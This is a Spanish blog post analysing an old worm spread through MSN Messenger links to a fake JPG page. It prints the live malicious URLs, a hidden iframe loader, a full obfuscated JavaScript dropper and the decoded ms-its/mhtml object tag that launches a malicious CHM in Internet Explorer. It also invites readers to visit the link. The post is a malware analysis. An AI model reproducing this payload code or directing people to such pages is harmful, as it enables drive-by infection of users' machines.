Un virus viendo un JPG ¿Por que tardaron tanto?

Me he encontrado con lo que ya había anunciado alguna vez; un virus (pinta de troyano) que con el simple hecho de ver una imagen JPG te infectaba; claro, el de ahora es mucho mas creativo.

Este virus en cuestión, según descripciones de Jesús, se instala en tu PC y en las conversaciones de MSN Messenger te coloca debajo de tu nick una dirección (Que tu no ves) donde ver el JPG en cuestión . . .así que el primer lu... amigo tuyo que te vea en messenger con esa URL, probablemente la abrirá y TOMA YA otro infectado mas y el ciclo continua... larga vida a Internet Explorer

Y esto lo digo porque es precisamente con Internet Explorer con quien se ejecuta el virus, si abres la URL del JPG en Firefox no pasara nada, ya que es invulnerable.
También invulnerables (Según Otro Blog Mas) las maquinas con el Service Pack 2 de Windows XP

Como siempre, no hay antivirus que valga, a menos que lo actualices . . . mañana; o bien, te pases a Firefox (Cuya versión 1.0 empieza su llegada) y te olvides de esos problemas

Ahora a la diversión

Pues que no me he aguantado y le he pedido a Jesús que me pase el link al JPG, así que para los mas osados (Y que no estén usando Internet Explorer) aquí lo tienen
http://www.xf2s.com/msn/wode.jpg

Empiezo a deshuesar el engendro, y este es el código interno que lo compone

Código :

<html>
<iframe src="news.htm" width="0" height="0" frameborder="0"></iframe>
<center><img src="1.jpg"></center>
<html>

Mmm, simples 4 líneas de código HTML; pero el mal se esconde mas allá, donde dice news.htm; Así que voy a buscar el mencionado archivo HTML
http://www.xf2s.com/msn/news.htm


Cuyo codigo es

Código :

<html><head><Meta Name=Encoder Content=»¶Ó­·ÃÎÊ>

<!--The page is protected by HTMLShip XP(Unregistered Version)-->
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
</head><body>
<script language="javascript"><!--
nJ8="\%shsssH0",gJ86="\%dh\'hHH0";.5200865,sG82=".6982664",
gJ86='ZzEl\@J1eR\]Ia4\ Xj\
<6y0A8F\.H\:\;C\nn\(mvP2Q\'\*tV\^TLh\r3\|\&Sx\#\,
5\=\+Krq\}fpW\>Boi\%csg\[D\{k\\Nw\/\"M\?Gb\)9\-\_7O\`Ud\~Y
\!u\$',nJ8='xYa\?u\ j\<o\\\%\nlBZe\#\{Nr6pWQM1hn\/7\'\]\-\+c
!k2Cs\^O\)g9\`3\,dKi\$\&qUmD\:\|P\;\*LfHE\[\.J8b\}\>
T0\"\=wySv\~VRG\@\rz5\_\(X4tIAF';function nQ62(fW84){"\%d\'\'\'d\'h",l=fW84.length;'Mq533B6B',w='';
while(l--)"\%d7\'\'0\'3",o=nJ8.indexOf(fW84.charAt(l)),
'NM3q3B3W\?\r63',w=(o==-1?fW84.charAt(l):gJ86.charAt(o))+w;
"\%\'khkkh\'",nJ8=nJ8.substring(1)+nJ8.charAt(0),
document.write(w);'MN\@35qBB'};
nQ62("\#J\.DE\;CB\?\n78A\n8\<qe\n\-\nJ\.DE\;CLD\}jrq
\`lGGhEP\'XH\.A\]\<7CQ\n\?\?R\>PA7\.CEH7B\rX\]\'R\>D\<CAD7BP
\n\?J\<\|hPA7\.CEH7B\r\]X\]\'R\>XH\.A\]\<7CQH7\.H7C\<KC\]
\<7Aq\rX\]hJ\<COE\]\<HAC\'y\r\]X\]\'Ry\$prrR\|h\r\]X\]\'Rh\|XH
\.A\]\<7CQH7\.H7C\<KC\]\<7Aq7\<\=BWA7\.CEH7\'yD\<CAD7BP
\n\?J\<yRhPA7\.CEH7B\r7X\]\'\<R\>EP\'XH\.A\]\<7CQ\?\nN\<DJ33
\=E7XH\=QJEX\<V\nDR\>EP\'\<Q\=gE\.gIqjRD\<CAD7BP\n\?J\<h
\|\|hEP\'XH\.A\]\<7CQ\?\nN\<DJR\>XH\.A\]\<7CQ\.\n\;CAD\<a
\-\<7CJ\'a\-\<7CQS5\(da\}5\*\"RhXH\.A\]\<7CQH7\]HAJ\<XH
\=7q\r7X\]h\|\<\?J\<\>XH\.A\]\<7CQH7\]HAJ\<A\;q\r7X\]h\|h8
\*zGqjcjjh\-Ollq\&cjchPA7\.CEH7B\rX\=J\'R\>\=E7XH\=QJC
\nCAJBqByOg\<B\;\n8\<BEJB\;DHC\<\.C\<XBVNBMOS\)dgE\;
BZ\+yhJ\<COE\]\<HAC\'y\rX\=J\'Ry\$jrrRh\|h\rX\=J\'RhX\ 
\&zql\{\`Gh\.njlqcrzchPA7\.CEH7B\rXXJ\'R\>EP\'XH\.A\]
\<7CQ\n\?\?R\>XH\.A\]\<7CQH7J\<\?\<\.CJC\nDCqPA7
\.CEH7B\'R\>D\<CAD7BP\n\?J\<\|hJ\<COE\]\<HAC\'y
\rXXJ\'Ry\$zrrR\|\|h\rXXJ\'RhV\+zlq\`cj\&h\.dp\{qp\`\&\{hC\}
GjqjcjlhP\ \`pqc\`\&lh\<\*Gpq\`lG\{hC\
(\{\`qzlGphTa\{pq\`\&\{hh\r\?E\.\<7J\<X\rCH\rqyyh\#wJ\.DE\;CL")
//--></script>
<sCRIPt LANGuAge=JavAsCrIpt>
nQ62("\{soisl\:olZ\[4USJE4oSZ8sruoUS4\[8\*ulrh\'E\'onSf
\`7\{ER\#oJsZ4lslUSd\$\<6\@n8\r\[s8h\-9s\-uh\;\[uohyyJh
\"\;EEM\-9sAxT\*ls9Pyso8sMJ9\-hhyso8sM9s\-SZsr\*oUSsoisyi
\r8J\:\[\*suosSf\{yER\#oJsf\`7\{ysoisl\:olf\`7\{8J\:\[\*sZul
\'bFlboUS\#l\+l8J\:\[\*sSf\`74EJF\-o\'sMw\:\[so\]JE4oM\+luFoM
\:o\*ulJo\]y\"xT\*ls9Pyb\&uEJls\[E\'M9\:o\;M8FR8s\:\[\'b\]6\&uEJls
\[E\'M9\:o\;M\[\'4oi\_\;\]2\'ow8M9s\-2GGGGn\`7\{y8J\:\[\*sf
\{slRuoZRE\:4o\:U6Zw\[4s9U\<66\.Z9o\[b9sU\!qZJouu8\*lJ\[
\'bU6ZJouu\*l44\[\'bU6f\{s\:f\{s4Zw\[4s9U5q\.Z9o\[b9sU\<
\@f\{Ru\[\'0f\{\-l\:\|Foof\)9oZ\*lboZ\[8Z\*\:EsoJso4ZRrZ1\)
vgK9\[\*\{y\-l\:\|Foof\{yRu\[\'0f\{ys4f\{s4Zw\[4s9U\!q\.Z9o
\[b9sU\<\@f\{8s\:E\'bf\{lZ9\:o\;U9ss\*hyywwwM0l\[89o\'bM
\'osy9s\-u89\[\*y\:ob\[8so\:M9s\-fcEwo\:ZRrZ1\)vgK9\[\*\{ylf
\{y8s\:E\'bf\{ys4f\{ys\:f\{yslRuof")</script></body></html>

Ah claro, ya entendí!
Aunque la verdad esta encriptado con la utilidad mencionada (Que por cierto esta unregistered, estos programadores de virus de hoy en día ); sin embargo saltarse esa encriptación es pan comido y del código desencriptado que me sale (Que por cierto es muy aburrido y tiene un aviso de registrar el mentado programa) resalto estas líneas

Código :

<object data="ms-its:mhtml:file://c:\foo.mht!${path}/test.chm::/test.htm" type="text/x-scriptlet"></object>

Este SI es el virus; un simple object que ejecuta un CHM (Compiled HTML) que tiene un código maligno que desde HTML ejecuta el código que hace funcionar a todo el virus; así podría seguir el desensamble, pero como ya esto se pone aburrido diré que actualmente Firefox ha dejado de ser un navegador de lujo a convertirse en una necesidad latente dados los hechos


¿Tiempo de cambiarte a Firefox (O a mozilla o a Opera o a Linux )?

¿Sabes SQL? ¿No-SQL? Aprende MySQL, PostgreSQL, MongoDB, Redis y más con el Curso Profesional de Bases de Datos que empieza el martes, en vivo.